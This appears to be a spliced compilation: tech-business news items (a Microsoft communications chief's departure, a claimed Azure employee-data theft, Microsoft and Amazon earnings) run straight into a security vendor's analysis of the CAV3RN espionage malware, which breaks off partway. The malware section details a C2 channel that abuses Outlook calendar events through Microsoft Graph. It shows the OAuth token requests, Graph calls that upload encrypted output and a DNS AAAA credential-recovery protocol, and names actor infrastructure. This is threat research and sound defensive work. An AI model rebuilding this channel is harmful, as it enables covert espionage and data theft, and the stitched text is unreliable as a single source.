Frank X. Shaw addresses the media at Microsoft on May 18, 2025, in advance of the Build conference. (GeekWire Photo / Todd Bishop)
It’s the end of an era at Microsoft: Frank X. Shaw, the executive who oversaw the tech giant’s communications for nearly three decades, first at an external agency and for the last 17 years as one of its senior leaders, is leaving at the end of the year.
Shaw, 64, said he’s not retiring, although he doesn’t have another job lined up. He plans to stop working for a while, do some of the things he hasn’t had time for, and then decide what’s next.
“I have had a ringside seat at some of the biggest leadership, technology, and business transformations that have ever taken place,” Shaw said, sharing the news of his departure (under embargo) in a phone call Thursday afternoon. “I just feel incredibly fortunate.”
He said he had been discussing his potential departure for some time with Takeshi Numoto, Microsoft’s chief marketing officer, looking for the right moment.
Microsoft has not announced a successor for his role as chief communications officer. In a LinkedIn post, Shaw said the company will consider internal and external candidates.
A statement from Shaw’s colleagues in corporate communications credited him for his many years shaping Microsoft’s “voice and reputation with intelligence, candor and wit. His leadership and contributions to the company are too extensive to list, as is the number of journalists who have, at one point or another, used his name in vain.”
A former Marine Corps public affairs officer, Shaw has worked with all three of Microsoft’s CEOs. He started on the agency side, at Waggener Edstrom — now known as We. Communications — when Bill Gates was still running the company.
He built his reputation defending and advocating for Microsoft through some of its hardest stretches: the antitrust years, the Windows Vista backlash, the scramble to replace Steve Ballmer as CEO, and the weekend in 2023 when OpenAI’s board fired Sam Altman.
As the company’s top communications executive, he has also told the story of Microsoft’s reinvention under CEO Satya Nadella, from the LinkedIn and Activision Blizzard deals to an AI push that has carried Azure past $100 billion in annual revenue.
Evolving with technology: Shaw has spent much of his career closely watching the tech landscape and moving Microsoft’s voice into new channels as they emerged.
“We’re always thinking about what is the art and science of communications,” Shaw told PRWeek. “How do we reach our audiences most effectively in a changing environment?” He called the arc from print to radio and TV to social media and newsletters a “constant evolution of influence.”
He turned the corporate blog into a place where the company argued its own case, writing “Microsoft by the numbers” himself in 2010 — a stat-by-stat comparison against Apple and Google that TechCrunch dubbed “fantastic passive-aggressive.”
He and his team experimented with different and risky methods of telling the company’s story, holding mass briefings under embargo and publishing documents known as the “Book of News” in advance of its major keynotes and conferences. The prospect of a reporter having to answer to “fxs” was no doubt a factor in ensuring the news (mostly) didn’t leak.
Shaw hired Steve Clayton out of a technical role at Microsoft in London, where he had been blogging about the company unofficially out of frustration with how it was perceived, and made him chief storyteller. In the middle of the AI boom, Clayton and Shaw embraced the analog undercurrents in popular culture and launched Signal, a quarterly Microsoft print magazine for business leaders.
Clayton was VP of communications strategy by the time he left in January to become chief communications officer at Cisco, making Shaw’s planned departure the second high-profile exit from Microsoft’s comms team in a year.
Adapting to AI: In recent years, Shaw made his own team a testing ground for AI, publishing what worked and what didn’t. In a 2023 post he described using Copilot in Teams to pull story ideas out of conversations with spokespeople and anticipate coverage after interviews, and asking the AI to “poke holes in a statement we’re making on a tricky topic.”
He called it his corporal, a reference to Napoleon, who was said to bring one to meetings and ask whether his generals’ war plans made sense to him. A survey of 80 people in Microsoft’s communications and marketing organization found 84% did not want to go back to working without it.
Shaw was also known to use AI as a sounding board when a story frustrated him, offering him an objective take before he called and let a particular reporter have it.
He announced his departure Friday morning in a message to Microsoft’s communications team (reminding them he’s still there for a few months yet) and his public post on LinkedIn.
“Thank you as well to all the reporters, editors, writers, influencers and analysts who have put up with me over this time, enduring my early and late night calls, my off the record ‘no comments,’ my bad story ideas and my extended commentary on headlines and positioning,” he wrote.
“You all have incredibly hard and valuable jobs,” he added, “and while I’ve not agreed with everything said about us 😊 I appreciate you anyway.”
A threat actor is claiming to have stolen millions of employee records from the Microsoft Azure environments of several major companies, raising concerns that the information could be used to launch targeted phishing, impersonation, and privilege escalation attacks.
The threat actor, known as “TheHatman,” has reportedly posted internal employee directories belonging to companies including McDonald’s, Vodafone, Kyndryl, Tata Consultancy Services (TCS), HCL Technologies, InterContinental Hotels Group, Gap, Hexaware Technologies, and Wyndham Hotels for sale on cybercrime forums.
According to various sources, samples of the data contained corporate email addresses and fields consistent with standard Azure directory exports. However, the exact method used to gain access remains unconfirmed.
Researchers said compromised credentials linked to many of the affected organisations had previously circulated following infostealer infections. Possible routes into the environments include stolen session tokens, phishing, weak MFA protections, or third-party integrations with excessive permissions.
Employee data creates a roadmap for attackers
The allegedly stolen information includes employee IDs, job titles, departments, reporting structures, group memberships, service accounts, and, in some cases, details of Global Administrator accounts.
Cian Heasley, Principal Consultant at Acumen Cyber, warned that information that initially appears relatively harmless can provide the foundations for further attacks.
“Names, job titles, phone numbers, service account labels, and global administrator identities are precisely the precursors required to build convincing spear-phishing, phone based social engineering and helpdesk request employee impersonation attacks against higher value accounts or systems,” Heasley said.
He also warned against dismissing older employee information as irrelevant.
“Enterprise org charts change slowly, service account naming conventions rarely change and historic breached data dumps can remain useful for aiding in the planning and execution of new attacks years after the original compromise took place.”
TCS has said it found no credible evidence that its systems or customer environments were breached. The company said the referenced information appeared to be more than four years old and limited to basic employee details.
Stolen credentials put cloud environments at risk
Muhammad Yahya Patel, vCISO and Cybersecurity Advisor for EMEA at Huntress, said the incident demonstrates how infostealer infections can ultimately lead to cloud compromise.
“Infostealers harvesting credentials from corporate devices, those credentials landing in criminal marketplaces, and a threat actor using them to access cloud environments that trusted those credentials without adequate verification. Same playbook. Different logos on the breach notification.”
Patel said cloud identity infrastructure is only as secure as the credentials and devices accessing it.
“Conditional access policies, continuous access evaluation, device compliance checks, and real-time credential compromise detection are the controls that close the gap between ‘credentials stolen by an infostealer’ and ‘attacker inside your cloud environment.'”
He described the employee information reportedly being sold as a “precision targeting kit” for spear phishing and executive impersonation.
Valid credentials should not mean unrestricted data access
Simon Pamplin, CTO at Certes, said the incident also raises questions about what attackers can do once legitimate credentials have been compromised.
“Stolen credentials should not automatically mean stolen data. That is the real issue with this campaign,” Pamplin said.
“The reported ability to use compromised credentials to extract huge volumes of information from enterprise cloud environments shows what can happen when successful authentication is effectively treated as permission to access and move data.”
Pamplin argued that organisations need to assume credentials will sometimes be stolen and ensure that compromising an identity does not automatically make sensitive information readable.
“Cloud security needs to separate identity from control of the data itself. Sensitive data flows should be independently encrypted, segmented and governed so that compromising an account does not provide unrestricted movement across the environment.”
The incident also carries potential supply chain implications. Heasley pointed to the presence of major IT service providers among the organisations named, warning that businesses should review which suppliers hold privileged access to their environments.
The case is also a reminder that data theft does not always arrive with a ransom demand. In this instance, the threat actor appears to be attempting to sell the information directly, meaning affected organisations may only become aware of the theft once their data surfaces on criminal forums.
Microsoft and Amazon both saw their stocks surge again Monday, riding a post-earnings tech wave across the stock market that pushed Amazon past $3 trillion in value for the first time.
The gains follow earnings reports last week in which both companies’ cloud platforms exceeded expectations. Microsoft said Azure grew 43%, passing $100 billion in annual revenue for the first time. Amazon said AWS grew 37%, its fastest pace in 18 quarters.
Microsoft and Amazon are now the world’s fourth and fifth most valuable companies, respectively. The three ahead of them (Nvidia, Alphabet and Apple) are all headquartered in the Bay Area, although each has sizeable engineering centers in the Seattle region.
Amazon rose 4.6% in intraday trading to $284.15 as of publication time, after touching an all-time high of $287.20 earlier in the session, giving it a market value of $3.06 trillion.
Microsoft climbed 5.2% to $488.97, worth $3.63 trillion. Its rally began Thursday, when it added nearly $450 billion in market value, the largest one-day gain by any company on record.
The rallies came despite AI spending plans that have unsettled investors for much of the year. Microsoft went into earnings near a one-year low, after a $357 billion wipeout to start the year.
It’s all still coming at a huge cost. Microsoft spent a record $41 billion on capital projects last quarter and told investors to expect more than $50 billion in the current quarter. Amazon raised its 2026 forecast to about $220 billion from $200 billion, citing rising memory chip prices.
In one sign of the impact of the spending, Microsoft’s free cash flow fell 23% last quarter. Amazon’s free cash flow turned negative for the first time since 2023.
But cloud growth and other signs of demand for AI seem to have appeased investors for now.
Amazon CEO Andy Jassy told investors the spending reflects unmet demand: “Even at that amount, we will still not have enough capacity to meet all the demand we have in 2026, and I believe this dynamic will also be true in 2027 too. In fact, the demand we already have for 2028 is striking.”
This week on the GeekWire podcast: Microsoft and Amazon both reported quarterly numbers, and both stocks rose on cloud results that beat expectations. Is all that AI spending paying off? And in related news, Microsoft sees a rare annual headcount decline, hitting product R&D hardest.
Plus: Satya Nadella builds a Power BI dashboard out of an analyst’s research report, and touts it on the earnings call to make a bigger point. Jeff Bezos names Amazon’s chips business as the long-awaited fourth pillar. And AI House managing director Jacob Colker delivers a much-needed pep talk for Seattle tech, calling on the region to recognize and build on its strengths.
Cybersecurity researchers at Wiz found CosmosEscape in Azure's Gremlin API, exposing a master key that could access any Cosmos DB account. Microsoft fixed it, with no customer impact found.
Microsoft’s Azure cloud business grew 43% last quarter, blowing past the company’s own forecast and surpassing $100 billion in annual revenue for the first time, providing fresh evidence of the potential for artificial intelligence to fuel new growth for the tech giant.
The company’s results for its fiscal fourth quarter also showed the price of that growth: capital spending hit a record $41 billion, largely to support the company’s AI buildout, and free cash flow sank 23% even as operating profits jumped 18%.
And in a new twist, Microsoft shares rose more than 5% in after-hours trading, in contrast with the recent pattern in which the company’s strong results were met with selloffs that pushed its stock near a one-year low.
Companywide results: Overall, Microsoft reported revenue of $90 billion for the quarter, up 18% from a year ago, and net income of $35.8 billion, up 31%. Analysts had expected $87.7 billion in revenue, a figure that was already at the top of Microsoft’s own guidance range.
Microsoft’s adjusted earnings of $4.74 per share topped the $4.24 that analysts expected, according to Yahoo Finance. That included a $3.2 billion gain on Microsoft’s investment in Anthropic, part of a 27-cent benefit from one-time items. Even excluding those items, the company said, it exceeded expectations across revenue, operating income and earnings per share.
Microsoft 365 Copilot surpassed 30 million paid seats, up from 20 million last quarter. That’s still less than 7% of the roughly 450 million commercial Microsoft 365 seats, a gap that has drawn investor skepticism all year.
Microsoft’s backlog grew 84% to $678 billion. Known as remaining performance obligation, or RPO, it’s the value of contracts that customers have signed but that Microsoft hasn’t delivered on yet, basically the business Microsoft has already locked in but has yet to record as revenue.
Investors have been worried for a year that too much of it came from a single customer, OpenAI. Microsoft said all of the $51 billion increase over the prior quarter came from customers other than the big AI model companies. Setting OpenAI aside, the backlog still grew 25%.
Windows OEM and Devices revenue declined 7%, hurt by slower PC demand and a tough comparison with last year’s Windows 10 upgrade wave. The decline would have been steeper, but PC makers built more machines to get ahead of rising memory prices, and Microsoft collects its Windows fee when a PC is built rather than when it’s sold.
Xbox content and services revenue fell 10% and Xbox hardware fell 13%. Microsoft also wrote down the value of unspecified Xbox assets. The company grouped that charge with severance costs and lower-than-expected costs from its retirement program — a net $500 million hit to operating income — and declined to say how much of it was Xbox or what was written down.
Microsoft has topped earnings expectations consistently in recent years, yet its stock is near a one-year low. So while it’s worth paying attention to revenue and profits when the company reports its fiscal year-end results Wednesday, there are clearly other forces at play on Wall Street.
Here are the key stats and trendlines to watch going into the earnings report for the fourth quarter of the company’s 2026 fiscal year, ended June 30.
Core numbers: Analysts expect revenue of about $87.7 billion for the quarter, up 14.7% from a year ago, and earnings of $4.24 per share, up 16%, according to Yahoo Finance. Microsoft’s own revenue guidance was $86.7 billion to $87.8 billion — meaning Wall Street is looking for a result at the very top of the company’s range.
For the full fiscal year, that works out to roughly $329 billion in revenue, up 17% from $281.7 billion in fiscal 2025.
Capital expense: This is the big one. Microsoft told investors to expect more than $40 billion in capital spending for the quarter, which would be a record — up from $31.9 billion in the March quarter and $37.5 billion in the one before that. About two-thirds goes to GPUs and other short-lived hardware.
For the calendar year, the company expects to spend roughly $190 billion. Chief Financial Officer Amy Hood said about $25 billion of that total is the result of higher component prices.
One big question this week will be the company’s guidance for capex going forward. Because this is the fiscal year-end, Wednesday brings the company’s first capital spending guidance for fiscal 2027, which began July 1.
Capex concerns: Google parent Alphabet last week foreshadowed what may happen to Microsoft. It reported revenue up 24% and cloud revenue up 82%, then raised its own capital spending forecast to as much as $205 billion — well above the roughly $188 billion analysts expected. The stock fell 7% the next day and Alphabet fell below its prior $4 trillion market valuation.
Big picture, investors seem to have decided the capital spending is getting ahead of the payoff. Data centers and chips cost money now, while the AI revenue meant to justify them arrives over years — if it ever reaches the scale these companies are promising.
Moody’s Ratings raised its own red flags about this last week, saying the six largest cloud and AI platforms will spend about $785 billion this year and close to $1 trillion in 2027. Demand is real and accelerating, the ratings agency said, but “the ultimate return on investment is unclear.”
Cloud margins: This is where the capital spending starts to become evident in the company’s core quarterly results. Microsoft Cloud gross margin — the share of cloud revenue left after the cost of delivering the service — has slipped from 72% three years ago to 66% last quarter.
For the quarter it reports Wednesday, Microsoft told investors to expect about 64%. On the prior earnings call, Hood attributed the decline to AI infrastructure costs and growing use of GitHub Copilot, partly offset by efficiency gains in Azure.
Microsoft doesn’t absorb the cost of a data center all at once. It spreads the expense across the years the equipment is expected to last. That cost shows up here, in the expense of running the cloud — making this one of the first places where the capital spending hits earnings.
Microsoft Azure: On its prior conference call, Microsoft said it expected the Azure cloud business to grow 39% to 40% in constant currency in Q4, a slight acceleration from the 39% posted in Q3. Analysts expect roughly the same, with some outliers such as BNP Paribas looking for 41%.
But the published expectations aren’t the real bar. In January, Azure grew 38% — ahead of Microsoft’s guidance — and the stock fell 10%, because Wall Street had privately been expecting 39.4%.
Azure’s growth rate also reflects a choice as much as it does demand. Microsoft has been routing scarce computing capacity to its own products first — Copilot, GitHub Copilot, internal research — and selling what remains to Azure customers. Hood has said the growth rate would have been higher had that capacity gone to customers instead. Demand continues to outrun supply, and the company expects to stay “constrained at least through 2026.”
Business Insider reported Sunday that the shortage of supply has pushed Microsoft to shop for additional computing capacity outside its own data centers, evaluating capacity from Amazon and Google, and that Amazon stepped in following a series of GitHub outages.
Copilot and AI revenue: Microsoft said in April that its AI business had reached a $37 billion annual revenue run rate, up 123% from a year earlier. It was the first update to that number since January 2025, when the company put it at $13 billion. Whether Microsoft discloses it a third time Wednesday is a signal in itself.
Microsoft 365 Copilot passed 20 million paid seats last quarter, up from 15 million in January. That’s about 4.4% of the 450 million commercial seats across Microsoft 365 — the gap that has drawn skepticism from investors all year. Microsoft said it expects the number of new paid seats to grow again this quarter.
Meanwhile, the company is launching new initiatives to drive adoption of AI among its customers. Earlier this month it launched the Microsoft Frontier Company, a $2.5 billion effort to put 6,000 engineers inside customer organizations to help them deploy AI.
Wednesday is also the first report since Microsoft changed how it charges for GitHub Copilot. As of June 1, customers pay based on usage rather than a flat fee per user.
The OpenAI backlog: Microsoft’s remaining performance obligations — RPO, a measure of contracts customers have signed but the company has not yet fulfilled — reached $627 billion last quarter, up 99% from a year earlier. About a quarter of that is expected to become revenue in the next 12 months. It’s the strongest evidence that there’s real demand supporting the AI buildout.
But the RPO is also highly concentrated. In January, when it stood at $625 billion, 45% was tied to OpenAI — roughly $281 billion committed by a single customer that is still losing money. Take OpenAI out of last quarter’s figure and the growth drops from 99% to 26%.
Then in April, Microsoft and OpenAI revamped their partnership, and OpenAI ended its exclusive commitment to run on Azure.
Reliability: On July 23, a bug in Microsoft’s automated network maintenance tooling cut a West US Azure data center off from the company’s global network, knocking out Teams, SharePoint, OneDrive and Copilot Chat for about five hours. Microsoft has published a preliminary post-incident report, and a final one is due within two weeks.
The outage falls in the quarter that began July 1, so it won’t appear in Wednesday’s numbers. But it comes as Microsoft is asking businesses to hand AI agents real control of their operations.
Retirement charge: Wednesday’s results will include about $900 million in one-time costs from Microsoft’s voluntary retirement program, the first in the company’s 51-year history. Hood said roughly $350 million falls in the cost of revenue and $550 million in operating expenses.
About 8,750 U.S. employees were eligible — 7% of Microsoft’s U.S. workforce — and about 30% accepted, Chief People Officer Amy Coleman confirmed in an interview with GeekWire, in line with what the company expected. Those departures reduced the size of the 4,800-job cut Microsoft announced July 6, which happened after this quarter ended.
Even with the retirement costs, Microsoft told investors it expects operating margins for the full fiscal year to be about a point higher than last year. Hood also said on last quarter’s call that headcount declined year over year and will keep declining in fiscal 2027.
Windows: Microsoft expects Windows OEM revenue — what PC makers pay to put Windows on their machines — to decline close to 20% this quarter.
A few factors are driving this:
Last year’s wave of PC upgrades, when support for Windows 10 ended, makes for a tough comparison.
PC makers stocked up on parts and machines ahead of rising memory prices and are now working through them.
The PC market itself is slower, because memory prices have made computers more expensive.
The memory shortage is hitting Microsoft a few different ways. In addition to adding about $25 billion to the company’s capital spending this calendar year, as noted above, it lowers what Microsoft earns from Windows. Also, in late June, Microsoft raised Xbox console prices by $100 to $150, saying storage and memory costs had risen more than 2.5 times.
This week: Facebook parent Meta reports the same afternoon as Microsoft, with Apple and Amazon on Thursday and Alphabet already out. Check back Wednesday afternoon for coverage.
In June 2026, as part of our Kaspersky Threat Intelligence Reporting service, we published extensive research on Project CAV3RN, a sophisticated modular framework used for cyberespionage activity against targets in Israel. We have been tracking this cluster since December 2025, and in late April 2026, we observed a major architectural shift: the developers moved from a three-component framework consisting of a downloader, executor, and uploader to a controller-based architecture with a dedicated WebSocket-enabled C2 communication component and a more extensible plugin system designed to support modular post-exploitation capabilities.
Subsequently, Check Point Research publicly reported on the same controller-based architecture in July 2026. However, neither our previous research nor the subsequent public reporting covered the latest communication component analyzed in this report.
Following our June 2026 publication, we identified a .NET Native AOT communication module that is apparently designed to replace the previous HTTP/WebSocket component. It exchanges commands and results through Outlook calendar events accessed via Microsoft Graph. If Microsoft Graph authentication or tenant validation fails, the module attempts to retrieve replacement connection settings through DNS AAAA responses.
Module network communication architecture
During the preparation of this report, additional public research covering this communication component became available. The research presented in our article is based on our independent analysis and includes several additional implementation details that complement the existing public reporting.
Technical details
The previously reported controller-based CAV3RN architecture separates C2 communication from command execution. The controller, uxtheme.dll, generates and maintains the seven-character Agent ID, manages the polling loop, processes built-in commands, and dispatches other tasks or commands to separate plugins. The previously used communication component, n-HTCommp.dll, retrieved commands and transmitted execution results over HTTP/WebSocket.
Project CAV3RN architecture (April 2026)
The module performs the same communication role but uses Outlook calendar events accessed through Microsoft Graph. Similarly to the previous version, its get and send interface and use of the same controller-generated Agent ID suggest that it was designed to replace the previous communication component. However, because the corresponding updated controller was not recovered, this replacement role is assessed rather than directly observed.
C2 communication module
The communication module, AzureCommunication.dll, is a DLL compiled with .NET Native AOT, consistent with several other components of the Project CAV3RN framework that are publicly documented. Such a compilation method turns the managed application into native machine code and removes most of the metadata and intermediate language that normally make .NET assemblies straightforward to analyze.
The module exposes its functionality through a single export named QueryInterface. We expect an updated controller to load the DLL, resolve this export, and pass it a null-terminated UTF-16 string. The accepted input format closely follows the interface used by the previously documented CAV3RN controller.
The _;;_ delimiter separates the operation from its arguments, while _,_ separates the arguments.
For get, the module only uses the first argument as the Agent ID. For send, it uses only the Agent ID and the result. In both cases, the additional legacy URL is ignored. It remains part of the interface for compatibility with the controller, even though the new module obtains its destination and credentials from its own Microsoft Graph configuration.
Outlook calendar events as a C2 channel
The DLL contains a complete default configuration, including the Microsoft Entra tenant ID, application credentials, target mailbox, DNS bootstrap host, and cryptographic keys required to establish communication.
Before processing either get or send operation, the module looks for a relative file named logAzure.txt. Because the code supplies only a filename, Windows resolves it against the current working directory of the process hosting the DLL.
If logAzure.txt exists, the module reads and deserializes it. If it is absent, the module builds the configuration from the hardcoded values and writes the complete object to disk with the following structure:
{
"TenantId": "******-****-****-****-**********", // Microsoft Entra tenant ID
"ClientId": "********-****-****-****-************", // application/client ID
"ClientSecret": "********************************************",
"UserEmail": "***@*********.co.il", // Compromised target Microsoft 365 mailbox
"Host": "cloudlanecdn[.]com", // DNS bootstrap domain
"PublicKey": "-----BEGIN RSA PUBLIC KEY-----\r\n[omitted]\r\n-----END RSA PUBLIC KEY-----", // outbound encryption public key
"PrivateKey": "-----BEGIN RSA PRIVATE KEY-----\r\n[omitted]\r\n-----END RSA PRIVATE KEY-----" // inbound decryption private key
}
Using the resulting configuration, the module creates a Microsoft Graph client and validates access by requesting the tenant’s organization record through a GET request to https://graph.microsoft.com/v1.0/organization.
Attempting this request causes the Azure Identity library to obtain an OAuth application token:
POST https://login.microsoftonline.com/<TenantId>/oauth2/v2.0/token
client_id=<ClientId>
client_secret=<ClientSecret>
scope=https://graph.microsoft.com/.default
grant_type=client_credentials
After successful authentication, the module includes the token in subsequent Graph requests using the Authorization: Bearer <access-token> header. The module uses the default calendar of the configured mailbox as a dead-drop channel. Commands, heartbeats, and results all occupy the same fixed one-hour window 2050-05-13 22:00–23:00 UTC.
Scheduling the events for 2050 makes them unlikely to appear in ordinary calendar views. The calendar event subject identifies each event’s purpose and associated Agent ID. Heartbeat and result subjects append the fixed suffix 1500 to this value; the suffix is not part of the Agent ID.
Subject format
Purpose
Module behavior
Event ID: <agent-id>
Operator-to-agent command
Searches for the event, downloads its attachments, and deletes it after consumption
Boss update ID: <agent-id>1500
Agent heartbeat
Deletes the previous heartbeat event and creates a replacement
Boss Report ID: <agent-id>1500
Agent-to-operator command output
Creates an event, uploads encrypted result attachments, and assigns the final subject
Receiving a command
For a get request, the module queries calendarView and filters the results by the Agent ID:
GET /v1.0/users/***@*********.co.il/calendarView?startDateTime=2050-05-13T22:00:00&endDateTime=2050-05-13T23:00:00&$filter=contains(subject,'Event ID: <agent-id>')
If Graph returns one or more matches, the module selects the first returned event and requests its attachments:
GET /v1.0/users/***@*********.co.il/events/<EventId>/attachments
Authorization: Bearer <access-token>
After obtaining the attachment response, the module deletes the calendar event:
Our analysis found a consistent difference in capitalization between command and result attachments:
Attachment name
Direction
Associated subject
file0.txt
Operator to agent
Event ID: <agent-id>
File0.txt
Agent to operator
Boss Report ID: <agent-id>1500
Inbound command decryption
Inbound commands use a combination of RSA and AES-GCM encryption. Once the attachments have been sorted and concatenated, the reconstructed encrypted command buffer begins with a 256-byte RSA-encrypted block containing the 32-byte AES key. The communication module decrypts this block with the RSA private key stored in its configuration, using RSA-OAEP with SHA-256.
The following 12 bytes contain the AES-GCM nonce, while the final 16 bytes contain the authentication tag. Everything between the nonce and tag is ciphertext. The module uses the recovered AES key to decrypt and authenticate this ciphertext with AES-256-GCM.
Encrypted attachment stored in a calendar event
After RSA-OAEP-SHA256 and AES-256-GCM decryption, the 63-byte ciphertext produces {"cid": "alXBCzcDl8hBuNE", "type": "self", "cmd": "003_;;__,_"}.
Decrypted command
The cid field appears to serve as a unique command-correlation identifier. As described in a previous publication of the framework, when the operator sets the JSON type field to self, the controller routes the command to its internal handler rather than dispatching it to an external plugin. In this command, the cmd field contains 003_;;__,_, where command 003 instructs the controller to toggle debug logging. After decryption, the communication module returns the complete command to the external controller through QueryInterface.
Sending command output
For a send request, the controller passes the command output to the communication module. The module encrypts the output using a newly generated AES-256-GCM key and protects that key with the configured RSA public key. It then divides the encrypted payload into chunks of up to 10 MiB.
To publish the result, the module creates a calendar event with the temporary subject d and attempts to add each encrypted chunk as a sequentially named attachment, such as File0.txt and File1.txt. After adding the attachments, it changes the subject to Boss Report ID: <agent-id>1500, marking the event as a completed result.
This process uses the following sequence of Microsoft Graph requests:
POST /v1.0/users/***@*********.co.il/calendar/events
POST /v1.0/users/***@*********.co.il/calendar/events/<EventId>/attachments
PATCH /v1.0/users/***@*********.co.il/events/<EventId>
Together, the uploaded attachments contain fragments of one encrypted result package: the RSA-encrypted AES key, AES-GCM nonce, encrypted command output, and authentication tag. Recovering outbound results requires the private key corresponding to the outbound public key. This private key is assessed to be held separately by the attacker.
Heartbeat handling
The module maintains a heartbeat event identified by the subject Boss update ID: <agent-id>1500. The module searches the same fixed calendar window for a previous heartbeat associated with the agent. If one exists, the module deletes it and creates a replacement event with the temporary subject d through the following sequence of Microsoft Graph requests:
GET /v1.0/users/***@*********.co.il/calendarView
DELETE /v1.0/users/***@*********.co.il/events/<EventId>
POST /v1.0/users/***@*********.co.il/events
Finally, it updates the newly created event through the following PATCH request, replacing the temporary subject d with Boss update ID: <agent-id>1500.
Heartbeat events use the same one-hour window in 2050 but contain no attachments.
The following figure summarizes the module’s operational workflow.
DNS AAAA configuration recovery mechanism
When OAuth token acquisition or the subsequent GET /v1.0/organization validation request fails, the module attempts to retrieve replacement TenantId, ClientId, ClientSecret, and UserEmail values through actor-controlled AAAA responses.
DNS-based configuration recovery (simplified)
The module uses cloudlanecdn[.]com as its configuration-recovery domain. The domain is delegated to four actor-controlled authoritative nameservers, ns1 through ns4.cloudlanecdn[.]com, allowing the operator to generate different AAAA responses according to the Agent ID, configuration field, and fragment offset.
The module submits the generated DNS queries through the operating system’s configured recursive resolver, which follows the domain’s delegation to one of the authoritative nameservers. The returned IPv6 address is treated as a 16-byte container for protocol data rather than as a network destination.
For both get and send operations, the controller supplies the seven-character Agent ID as the first argument to QueryInterface. The communication module converts its UTF-8 bytes into two-character uppercase hexadecimal values. For example, SFmLgQZ becomes 53 46 6D 4C 67 51 5A, which the module concatenates as 53466D4C67515A.
The hexadecimal identifier is then embedded in every recovery query. The module retrieves four Microsoft Graph configuration values in a fixed order, with each value assigned a numeric index:
Index
Configuration value
0
TenantId
1
ClientId
2
ClientSecret
3
UserEmail
Determining the field length through .p. queries
For each configuration value (TenantId, ClientId, ClientSecret, and UserEmail), the module first sends an AAAA query to determine the value’s total length: d.<hex-agent-id>.<field-index>.p.<host>.
In this format, <hex-agent-id> is the uppercase hexadecimal representation of the Agent ID supplied by the controller. The <field-index> identifies the requested configuration value according to the table above; for example, index 0 represents TenantId. The p marker indicates a length request, while <host> contains the configured DNS recovery domain, cloudlanecdn[.]com.
As an example, the following AAAA DNS query requests the length of the TenantId associated with Agent ID SFmLgQZ:
d.53466D4C67515A.0.p.cloudlanecdn[.]com
The AAAA response 2001:24:1234:5678:9abc:def0:1122:3344 corresponds to the byte sequence 20 01 00 24 12 34 56 78 9A BC DE F0 11 22 33 44. The module discards the first two bytes and interprets the following two bytes, 00 24, as a big-endian field length. This produces the value 0x0024, or 36 bytes. The remaining 12 bytes are ignored. The initial 2001 group is not treated as a network destination or strictly validated as a protocol marker; it simply occupies the two bytes that the module discards.
IPv6 AAAA record payload layout for obtaining length
In the observed example, the same process produced a 36-byte TenantId, a 36-byte ClientId, a 40-byte ClientSecret, and a 28-byte UserEmail. The protocol itself supports other lengths because each value’s length is supplied dynamically by its .p. response.
To illustrate this process, we reproduced the protocol in a controlled environment using a laboratory domain.
Field length encoding in DNS AAAA record responses (example)
Retrieving configuration data through .q. queries
After obtaining the field length from the .p. response, the module allocates a buffer of exactly that size and initializes an offset to 0. It then requests the field data using the following format: d.<hex-agent-id>.<field-index>.<offset>.q.<host>.
The <field-index> identifies the requested configuration value, while <offset> specifies where the fragment belongs in the output buffer. After checking for the sentinel address, the module discards the first two bytes of each normal .q. response and copies up to 14 of the remaining bytes. For the final response, it copies only the bytes required to reach the declared field length.
Queries continue at 14-byte offsets until the declared field length has been recovered.
The following figure shows the three .q. requests required to reconstruct a 36-byte TenantId.
TenantId retrieval process via DNS AAAA records (example)
In our laboratory responses, the first two bytes appear as the IPv6 group 2001 and are discarded. The responses at offsets 0 and 14 each provide 14 bytes, while the response at offset 28 supplies the final eight bytes. Concatenating and decoding these fragments produces the complete TenantId, 6f9d2a41-8c73-4b56-a1e8-2d407c95f3ab, as shown in the example figure.
The module repeats this procedure for ClientId, ClientSecret, and UserEmail. After reconstructing each value, it decodes the buffer as UTF-8, updates the corresponding configuration field, and writes the complete configuration to logAzure.txt. Once all four fields have been recovered, the module creates a new Graph client, repeats the /organization validation request, and resumes the original get or send operation if validation succeeds.
The DNS recovery mechanism updates only the TenantId, ClientId, ClientSecret, and UserEmail fields. It does not replace the configured DNS recovery host, RSA public or private keys, offering limited rotation for updating the domain itself that is used within the DNS fallback mechanism.
Failure handling and the sentinel AAAA response
In this module, the hard-coded IPv6 address 2001:4998:44:3507::8000 acts as a failure sentinel. After resolving an AAAA query, the module converts the first returned address to a string and compares it with this value before extracting any bytes. If the values match, it raises an exception and does not interpret the response as either a field length or configuration data.
The address belongs to Yahoo’s 2001:4998::/32 allocation. We could not determine why the developers selected it. The authoritative backend may return it for an unknown Agent ID, an unavailable field, an invalid index or offset, or an agent for which recovery is disabled. These conditions remain hypothetical because the backend was unavailable and the module handles every sentinel response in the same way.
Infrastructure
Historical DNS data shows that cloudlanecdn[.]com was registered on December 24, 2025. The domain initially used the Namecheap-operated nameservers dns1.registrar-servers.com and dns2.registrar-servers.com. On May 2, 2026, passive DNS first observed a transition from these vendor-managed nameservers to custom nameservers under cloudlanecdn[.]com.
Domain
IP
First seen
ASN
Hosting
ns1.cloudlanecdn[.]com
216.126.237[.]197
144.172.108[.]205
May 2, 2026
AS 14956
RouterHosting LLC
ns2.cloudlanecdn[.]com
216.126.237[.]197
144.172.108[.]205
May 2, 2026
AS 14956
RouterHosting LLC
ns3.cloudlanecdn[.]com
216.126.237[.]197
144.172.108[.]205
May 2, 2026
AS 14956
RouterHosting LLC
ns4.cloudlanecdn[.]com
144.172.108[.]205
May 21, 2026
AS 14956
RouterHosting LLC
Although the domain was delegated to four nameserver hostnames, their shared IP addresses reveal logical redundancy rather than four independently hosted DNS servers.
The shift from vendor‑managed DNS to custom in‑bailiwick authoritative nameservers aligns with the module’s DNS recovery design.
The DNS timeline overlaps with this new module’s development. Passive DNS first recorded the custom delegation on May 2, after the controller-and-plugin architecture was observed in April and before the May 19 timestamp stored in the new module. Because the custom authoritative infrastructure supports the module’s recovery protocol, we assess with moderate confidence that the infrastructure and module were prepared as part of the same development cycle.
Attribution
In our previous report, we attributed Project CAV3RN to OilRig (APT34) with low confidence. Analysis of the newly identified module provides additional evidence supporting this link.
Microsoft-hosted services for C2
Several OilRig malware strains have used Microsoft-hosted services for C2. RDAT malware exchanged commands and results through EWS email messages, and there are cases reported with the SC5k malware using Office 365 drafts, and OilCheck malware using Microsoft Graph to access Outlook drafts. CAV3RN uses the same class of service but stores commands and results in Outlook calendar events.
Secondary recovery mechanism for cloud C2
ESET previously documented OilBooster, which retrieved a replacement OAuth refresh token from a likely compromised website after repeated failures communicating with Microsoft OneDrive.
